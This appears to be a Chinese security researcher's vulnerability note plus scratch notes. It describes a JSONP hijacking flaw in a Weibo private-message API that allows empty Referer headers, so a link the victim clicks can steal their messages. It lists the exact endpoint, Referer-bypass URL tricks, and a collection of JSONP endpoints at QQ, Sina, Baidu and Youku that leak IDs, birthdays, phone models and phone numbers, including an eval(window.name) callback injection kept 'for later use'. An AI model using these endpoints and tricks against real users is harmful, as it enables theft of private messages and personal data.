点击我的链接就可以偷走你的微博私信

一、漏洞说明:

微博上你点我的链接我就可以看到你的私信内容

二、漏洞证明:

http://api.weibo.com/webim/2/direct_messages/contacts.json?source=209678993&count=500&add_virtual_user=5,&is_include_group=1&callback=msg

这应该是浏览器端微博私信的一个API

这是一个JSONP接口,也验证了referer,但是允许空referer!!

所以我们可以构造页面跨协议发送请求。这样可以空referer访问

==================================

绕过referer的一些技巧

 http://xxx.com/?http://sina.com.cn

http://sina.com.cn.xxx.com/

JSONP的一些笔记

游戏安全:这一条可以查询QQ号,玩那些游戏,以及游戏时间[已失效]

昵称生日:这一条可以查指定QQ号的昵称和生日

JSON:这个没有callback暂时不知道怎么用,会返回朋友网的一些信息

新浪微博:可以查询ID 以及几个不知名参数

新浪微博:ID 昵称 头像

http://game.weibo.com/home/indexv3/pajaxUserInfo?callback=getdata

http://guba.sina.com.cn/api/?s=user&a=check_friend&uid=&uids=http://guba.sina.com.cn/api/?s=user&a=check_friend&uid=&uids=2882345664&rn=1457361094127222&rn=1457361094127222

http://wyxgw.game.weibo.com/index.php?appid=1111&callback=eval(window.name);//

留存备用,如果遇到$.getscript(“限制新浪域”)就能用到了

http:///a.mp3

新浪博客self-xss。。。

http://fm.baidu.com/dev/api/?tn=playlist&special=flash&prepend=&format=json&id=public_tuijian_suibiantingting&callback=packFmLoadSo

抓百度id

http://map.baidu.com/?qt=deviceInfoNew&type=1&uid=&routeInfo=&t=1457952588507&callback=asd

可以获得用户手机型号

http://app.gamevip.qq.com/cgi-bin/gamevip_other/qqgame_get_relation?type=3&callback=jsonp1458041577226&filter_type=3&appid=0&_=1458041577244

获取好友的接口 但是做了referer限制。找个flash做csrf?。

http://act.vip.youku.com/vipactive/active/index.php?c=reg_partner&a=reg&code=10001&callback=getmobile 优酷手机号